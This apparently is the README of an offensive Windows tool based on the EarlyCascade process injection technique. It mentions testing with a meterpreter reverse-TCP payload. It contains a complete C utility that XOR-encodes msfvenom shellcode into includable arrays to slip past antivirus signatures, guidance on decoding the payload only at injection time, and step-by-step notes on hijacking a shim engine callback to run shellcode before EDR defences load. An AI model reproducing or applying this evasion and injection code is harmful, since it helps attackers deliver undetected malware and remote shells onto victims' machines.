EarlyCascade is a modern and stealthy process injection technique discovered by Outflank. It injects and executes code in the early stages of process creation, before EDRs have loaded their user-mode detection measures. The technique forces the Shim engine to be enabled, which allows a Shim engine callback to be hijacked.
The original code by 0xNinjaCyclone had a hardcoded injection process name and static plain shellcode. I wanted to load dynamic shellcode from files into a process of my choice. To get rid of plain msfvenom shellcode detections by several AVs, I made a basic XOR encryption of the embedded shellcode. I also made a Visual Studio 2022 template, ready to compile and run. I did not yet find out why non-msfvenom shellcode crashes the hosting payload process, so just use msfvenom shellcode for now. I successfully tested with meterpreter_reverse_tcp.
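The following is an added example, not code from this repository or from 0xNinjaCyclone's original project. It shows the build-time half of the approach described above: read raw shellcode from a file (for example `msfvenom ... -f raw`), XOR it with a rolling multi-byte key, and emit the encoded blob plus the key as C arrays that a loader can `#include`. The key value, the array names `xor_key` and `xor_sc`, and the 16-byte sample blob in the self-check are assumptions made for illustration; the sample only mimics the first bytes of a typical msfvenom x64 stager and is not a working payload.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Illustrative key (assumed value); generate a fresh one per build so the
 * encoded blob itself does not become a stable signature. */
static const uint8_t XOR_KEY[] = { 0x5a, 0xa7, 0x31, 0xc4 };

/* Rolling multi-byte XOR. XOR is its own inverse, so the same call encodes
 * the blob at build time and decodes it in the loader at run time. */
static void xor_crypt(uint8_t *buf, size_t len, const uint8_t *key, size_t keylen)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % keylen];
}

/* Byte-string search, used to confirm a plaintext signature is gone. */
static int contains(const uint8_t *hay, size_t hlen, const uint8_t *needle, size_t nlen)
{
    if (nlen == 0 || nlen > hlen)
        return 0;
    for (size_t i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0)
            return 1;
    return 0;
}

/* Render a byte buffer as a C array definition the loader can #include.
 * Returns the number of characters written, or 0 if `cap` is too small. */
static size_t emit_c_array(char *out, size_t cap, const char *name,
                           const uint8_t *buf, size_t len)
{
    int n = snprintf(out, cap, "static const unsigned char %s[%zu] = {", name, len);
    if (n < 0 || (size_t)n >= cap)
        return 0;
    size_t pos = (size_t)n;
    for (size_t i = 0; i < len; i++) {
        n = snprintf(out + pos, cap - pos, "%s%s0x%02x",
                     i ? "," : "", (i % 12 == 0) ? "\n    " : " ", buf[i]);
        if (n < 0 || (size_t)n >= cap - pos)
            return 0;
        pos += (size_t)n;
    }
    n = snprintf(out + pos, cap - pos, "\n};\n");
    if (n < 0 || (size_t)n >= cap - pos)
        return 0;
    return pos + (size_t)n;
}

/* Read a raw shellcode file into `out`. Returns the byte count, or 0 if the
 * file is missing, empty, or larger than `cap`. */
static size_t read_file(const char *path, uint8_t *out, size_t cap)
{
    FILE *f = fopen(path, "rb");
    if (!f)
        return 0;
    size_t n = fread(out, 1, cap, f);
    int truncated = fgetc(f) != EOF;
    fclose(f);
    return truncated ? 0 : n;
}

/* Self-check on a constructed 16-byte sample (not a working payload).
 * Returns 0 on success, otherwise the number of the failed step. */
static int demo_roundtrip(void)
{
    static const uint8_t sample[16] = {
        0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00,
        0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51 };
    uint8_t work[16];
    char src[512];
    const char *want = "static const unsigned char xor_sc[16] = {\n    0xa6, 0xef";

    memcpy(work, sample, sizeof work);
    xor_crypt(work, sizeof work, XOR_KEY, sizeof XOR_KEY);      /* encode */
    if (memcmp(work, sample, sizeof work) == 0) return 1;        /* must differ */
    if (contains(work, sizeof work, sample, 6)) return 2;        /* prologue gone */
    if (!emit_c_array(src, sizeof src, "xor_sc", work, sizeof work)) return 3;
    if (strncmp(src, want, strlen(want)) != 0) return 4;
    xor_crypt(work, sizeof work, XOR_KEY, sizeof XOR_KEY);      /* decode */
    if (memcmp(work, sample, sizeof work) != 0) return 5;
    return 0;
}

/* Usage: xorsc <raw_shellcode_file> > shellcode.h */
int main(int argc, char **argv)
{
    static uint8_t sc[1 << 18];   /* up to 256 KiB of raw shellcode */
    static char src[1 << 21];
    if (argc != 2) {
        fprintf(stderr, "usage: %s <raw shellcode file>\n", argv[0]);
        return 2;
    }
    size_t len = read_file(argv[1], sc, sizeof sc);
    if (!len) {
        fprintf(stderr, "cannot read %s (missing, empty or > 256 KiB)\n", argv[1]);
        return 1;
    }
    xor_crypt(sc, len, XOR_KEY, sizeof XOR_KEY);
    if (!emit_c_array(src, sizeof src, "xor_key", XOR_KEY, sizeof XOR_KEY) ||
        fputs(src, stdout) == EOF)
        return 1;
    if (!emit_c_array(src, sizeof src, "xor_sc", sc, len) ||
        fputs(src, stdout) == EOF)
        return 1;
    return 0;
}
```

In the loader, copy `xor_sc` into a writable buffer and call `xor_crypt` with `xor_key` only immediately before the bytes are written into the target process, so the plaintext shellcode exists nowhere on disk and only briefly in the injector's memory. Note that single-pass XOR hides static signatures only; it does nothing against a scanner that inspects the target process after the APC runs.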
(Original Readme from here)
- Creating a process in suspended mode.
- Dynamically locating the addresses of the enabling flag and the callback.
- Remotely allocating memory for our stub and shellcode.
- Injecting the stub and shellcode into the target process.
- Forcing the shim engine to be enabled.
- Hijacking a shim engine callback.
- Triggering the callback by resuming the process thread.
At this point, the stub gets executed, and does the following:
- Disrupting the initialization of detection measures.
- Disabling the Shim engine to avoid a crash.
- Queuing an Asynchronous Procedure Call (APC) that executes the shellcode later.